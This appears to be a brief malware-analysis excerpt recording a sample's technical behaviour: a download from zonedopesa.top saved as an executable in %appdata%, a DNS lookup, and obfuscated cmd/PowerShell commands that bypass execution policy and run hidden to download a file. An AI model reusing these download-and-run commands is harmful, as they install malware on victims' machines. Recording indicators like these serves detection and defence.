Technical Information
- http://www.zonedopesa.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poweRSH^ELL.eX^E -^eXecUti^OnPO^lIcy b^y^P^Ass^ -^no^PR^ofi^lE^ -w^iNDO^w^sT^Yl^E ^hIDDE^n ^(^nE^W^-OBjeCT SYs^TEM.nE^t.^WEbcL^Ient^)^.d^OwNL^o^ADFi^lE('http://www.zoned...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "poweRSH^ELL.eX^E -^eXecUti^OnPO^lIcy b^y^P^Ass^ -^no^PR^ofi^lE^ -w^iNDO^w^sT^Yl^E ^hIDDE^n ^(^nE^W^-OBjeCT SYs^TEM.nE^t.^WEbcL^Ient^)^.d^OwNL^o^ADFi^lE('http://www.zoned...' (with hidden window)